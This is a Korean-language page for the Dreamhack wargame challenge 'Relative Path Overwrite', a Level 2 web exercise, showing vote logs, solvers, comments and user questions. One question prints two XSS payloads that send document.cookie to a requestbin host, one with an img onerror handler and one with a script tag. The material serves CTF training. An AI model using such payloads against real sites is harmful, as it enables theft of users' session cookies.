학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 2
Relative Path Overwrite
web
1319
651
2022.03.31. 11:54:01
로그인 하고 문제 풀기
문제 정보
풀이
26
난이도 투표
92
질문
3
최근 풀이자
651
댓글
11
문제 설명
Description
Exercise: Relative Path Overwrite에서 실습하는 문제입니다.
문제 수정 내역
2023.08.10
bot.py
수정, Dockerfile 제공
Translate
난이도 투표
92
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 19
Unreal
대표 업적 없음
LEVEL 2에 투표했습니다.
8일 전
cmdking
대표 업적 없음
LEVEL 2에 투표했습니다.
8일 전
Akai
대표 업적 없음
LEVEL 2에 투표했습니다.
14일 전
yoon_99
대표 업적 없음
LEVEL 1에 투표했습니다.
16일 전
seo1
묘목
LEVEL 2에 투표했습니다.
22일 전
질문
3
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
img태그와 script태그
index.php/?page=vuln¶m=<img src=@ onerror=location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie> 이건 드림핵 강의에서 제공한 img태그를 사용한 페이로드입니다 index.php/?page=vuln¶m=<script>location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie;</script> 이건 제가 입력한 script태그를 이용한 페이로드입니다 img태그는 requestbin으로 요청이 가는데 script태그를 사용하면 요청이 가지 않습니다 무엇이 문제인가요..?
ㅤㅤㅤㅤ
답변
1
추천
0
3개월 전
base 태그
혹시 base태그가 안 먹히는데 이유가 있을까용
mooji
답변
1
추천
0
1년 전
report.php의 flag 셋팅 질문 (스포가 될 수 있으니 풀고 보세요~)
일반적으로 여타 다른 문제들 보면 report 페이지에서 admin으로 로그인해서 가던가, flag를 셋팅해서 가던가 하는 코드가 보이는데요. 본 문제는 report 페이지를 통해 flag를 유출하는 것은 맞지만, report 페이지에서 flag를 셋팅해서 쿠키로 가져간다는 코드가 주어진 코드에 없더라고요. 이런 경우, 그냥 일반적으로 report 페이지를 통해 푸는 것이니, report 페이지로 취약 페이지 요청하고 cookie 확인해봐야지. 라고 유추를 해야 하는 건가요? 아니면 제가 flag가 어디 셋팅되어 있다는 것을 놓친걸까요?
l000wk3y
답변
2
추천
0
2년 전
«
‹
1
›
»
LEVEL 2
Relative Path Overwrite
web
1319
651
2022.03.31. 11:54:01
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
Dreamhack official account
First Blood!
as3617
워게임 고인물
출제된 지
5시간
만에 풀이 완료!
최근 풀이자
651
Bayu
대표 업적 없음
12시간 전
해킹못해요
대표 업적 없음
13시간 전
RTV
대표 업적 없음
1일 전
se0ng1
Web3 초심자
2일 전
ASLHS
대표 업적 없음
4일 전
bkfake
대표 업적 없음
5일 전
jtjisgod_lge
대표 업적 없음
6일 전
Unreal
대표 업적 없음
8일 전
cmdking
대표 업적 없음
8일 전
bintab1e
대표 업적 없음
10일 전
«
‹
1
2
3
4
5
›
»
댓글
11
어제의 나보다 나아진 오늘을 희망하며
컴퍼니
2개월 전
어제의 나보다 나아진 오늘을 희망하며
Translate
해킹배우고시퍼요
대표 업적 없음
2년 전
더하기를 주의하라
Translate
O_F
대표 업적 없음
2년 전
welcome
Translate
사용자
해결사
2년 전
Welcome to rpo world~
Translate
l000wk3y
공부벌레
2년 전
연계하는 취약점에 따른 태그를 잘 생각해봐야 합니다.
Translate
yoobi
워게임 고인물
2년 전
good
Translate
weakness
Cloud 9
3년 전
ez
Translate
sinse100
대표 업적 없음
3년 전
just like session
Translate
Photojuice
공부벌레
3년 전
풀만합니다 !
Translate
Zer0Luck
해결사
3년 전
😀
Translate
«
‹
1
2
›
»
댓글 11